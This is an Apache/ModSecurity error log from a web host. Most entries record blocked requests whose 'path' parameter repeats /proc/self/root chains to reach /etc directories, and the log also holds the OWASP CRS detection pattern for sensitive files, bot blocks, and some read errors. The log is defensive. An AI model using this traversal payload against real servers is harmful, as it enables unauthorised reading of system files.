[Wed Mar 18 15:19:34.346779 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.244.43:50328] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrstgkwaGbbGflqUZBDNQAAAM8"]
[Wed Mar 18 15:19:41.277442 2026] [:error] [pid 29882:tid 140411658000128] [client 74.7.228.61:44312] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrsvUzinOy1jxa1j4dMcgAAAQo"]
[Wed Mar 18 15:20:30.563634 2026] [mime_magic:error] [pid 29882:tid 140411691570944] (70014)End of file found: [client 57.141.18.92:35722] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:21:22.161151 2026] [:error] [pid 11816:tid 140411548894976] [client 74.7.241.31:42660] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrtIuw_le52K8_3pV0MhgAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 15:21:36.421546 2026] [mime_magic:error] [pid 17653:tid 140411716749056] (70014)End of file found: [client 74.7.243.128:38952] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib/.build-id
[Wed Mar 18 15:21:36.422114 2026] [mime_magic:error] [pid 11816:tid 140411540502272] (70014)End of file found: [client 57.141.18.52:37478] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:21:51.659517 2026] [:error] [pid 15051:tid 140411708356352] [client 74.7.243.128:52632] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrtPymAPhZkrhU8w4mb2gAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:21:52.074226 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.241.31:55278] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrtQOyqAr6etmhZHNr5IQAAAEM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:22:05.095751 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.243.128:43010] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrtTeyqAr6etmhZHNr5NQAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:22:11.004549 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.243.128:34644] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrtUcdf6f5d65gmYZQFugAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:22:41.720284 2026] [:error] [pid 29882:tid 140411582465792] [client 74.7.243.128:53746] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrtcUzinOy1jxa1j4dNDAAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:22:52.055644 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.243.128:53602] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrtesdf6f5d65gmYZQFwwAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:23:08.494098 2026] [:error] [pid 15051:tid 140411599251200] [client 74.7.243.128:34134] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrtjCmAPhZkrhU8w4mcCAAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:23:14.949937 2026] [mime_magic:error] [pid 15826:tid 140411616036608] (70014)End of file found: [client 57.141.18.34:40130] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:23:17.815581 2026] [mime_magic:error] [pid 15826:tid 140411624429312] (70014)End of file found: [client 57.141.18.21:40140] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:23:24.549790 2026] [mime_magic:error] [pid 11816:tid 140411691570944] (70014)End of file found: [client 74.7.243.128:39940] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/var/run/udev
[Wed Mar 18 15:23:30.318952 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.243.128:42614] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrtouyqAr6etmhZHNr5bAAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 15:24:17.835272 2026] [:error] [pid 14269:tid 140411565680384] [client 74.7.243.128:43296] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrt0QbLMZ6AikZjR9XwPgAAABU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 15:24:28.923041 2026] [mime_magic:error] [pid 17653:tid 140411582465792] (70014)End of file found: [client 74.7.241.31:38996] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/usr/lib/firmware/radeon
[Wed Mar 18 15:24:35.727453 2026] [:error] [pid 11816:tid 140411658000128] [client 74.7.244.43:46886] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrt4-w_le52K8_3pV0M0wAAAgo"]
[Wed Mar 18 15:24:41.785210 2026] [:error] [pid 29882:tid 140411666392832] [client 74.7.228.61:42442] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrt6UzinOy1jxa1j4dNawAAAQk"]
[Wed Mar 18 15:25:08.685756 2026] [mime_magic:error] [pid 29882:tid 140411641214720] (70014)End of file found: [client 216.73.216.191:59563] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:25:12.983246 2026] [mime_magic:error] [pid 17653:tid 140411599251200] (70014)End of file found: [client 216.73.216.191:5524] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:25:22.660918 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.243.128:36294] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abruEta6ubjKNq_cu4bOqgAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:25:41.660407 2026] [:error] [pid 29882:tid 140411582465792] [client 74.7.243.128:55020] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abruJUzinOy1jxa1j4dNkQAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 15:25:48.287200 2026] [mime_magic:error] [pid 15826:tid 140411649607424] (70014)End of file found: [client 57.141.18.76:45284] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:26:12.679533 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.243.128:35006] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abruRAkwaGbbGflqUZBEbQAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 15:26:50.966281 2026] [mime_magic:error] [pid 29882:tid 140411607643904] (70014)End of file found: [client 57.141.18.37:47446] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:26:59.604322 2026] [:error] [pid 14269:tid 140411565680384] [client 74.7.243.128:54830] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrucwbLMZ6AikZjR9Xw2wAAABU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:27:29.368174 2026] [:error] [pid 29882:tid 140411699963648] [client 74.7.243.128:45816] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrukUzinOy1jxa1j4dOAQAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:28:03.210026 2026] [:error] [pid 14269:tid 140411557287680] [client 74.7.241.31:40732] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abruswbLMZ6AikZjR9XxGwAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:28:10.518412 2026] [mime_magic:error] [pid 17887:tid 140411590858496] (70014)End of file found: [client 57.141.18.63:50052] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:28:29.701592 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.243.128:43144] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abruzeyqAr6etmhZHNr6wAAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Wed Mar 18 15:28:42.671218 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.243.128:36438] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag 